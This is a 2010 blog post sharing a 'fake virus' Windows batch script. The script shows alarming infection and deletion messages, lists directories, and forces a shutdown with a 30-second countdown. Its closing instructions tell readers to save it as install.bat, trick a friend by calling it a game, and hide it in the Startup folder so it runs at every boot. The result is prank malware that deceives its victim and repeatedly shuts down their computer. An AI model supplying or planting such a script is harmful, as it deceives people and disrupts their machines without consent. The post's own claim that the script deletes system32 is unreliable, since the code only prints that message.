Tuesday, March 23, 2010

Fake Batch Virus

I've seen lots of fake viruses, some R nice some are good, but this one that I made is better than others.
Now it does nothing much it only opens command prompt and asks U 2 hit a key when U hit a key it starts showing a message that it is a virus and it'll delete all your files, D usual stuff.
Then it appears that D computer is scanning 4 D virus and it deletes D system32 folder and then your computer can't reboot and it shuts down. There is a code that creates a shutdown countdown at D end.
So Here's D code
@echo off
rem Batch Attack v1.0
rem Created By Tanmay Das
title Command Prompt
echo.
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
pause
cls
color 04
title Mad Hatter v0.1
echo.
echo I have something to tell you.
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
:rest
echo Actually I'm a virus.....
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo I will delete your files.....
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo COOL RIGHT!!!!
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo So you better say goodbye to all your files!!
@ping 127.0.0.1 -n 3 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Nothing Personal it's just the way I was made :)
@ping 127.0.0.1 -n 4 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
cls
title Microsoft Windows [Version 5.1.2600]
echo.
echo WARNING!!!!!!!!!
echo.
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo Virus Infection found in the system
echo.
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo Scanning System for Infected Files
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
dir/s
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
dir/d
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo System Scan Completed!!!!!!!!
echo.
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo Infected Files Found
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo C:\WINDOWS\system32
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Deleting Infected Files!!!!!
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 1 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo ACCESS DENIED !!!!!!!!
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Cannot Delete Infected Files!!!!!
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo System Files Corrupted
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Windows Has Found Fatal Runtime Error
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Windows Can Not Reboot Itself
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
echo Windows Is Shutting Down
@ping 127.0.0.1 -n 2 -w 1000 > nul
@ping 127.0.0.1 -n %1% -w 1000> nul
echo.
msg * Windows is Shutting Down
shutdown -s -t 30 "Windows file write delayed. Unable to locate system.exe"
EXIT

Copy Paste it in Notepad and save it as install.bat
Tell your friend it's a new game or something. It'll B fun.
Hide this file in the Startup folder in C:\Documents and Settings\Username\Start Menu\Programs\Startup
Then It'll automatically start on every boot up.

Next I'll post a code 2 copy this file 2 Startup folder so U don't have 2.

No comments:

Post a Comment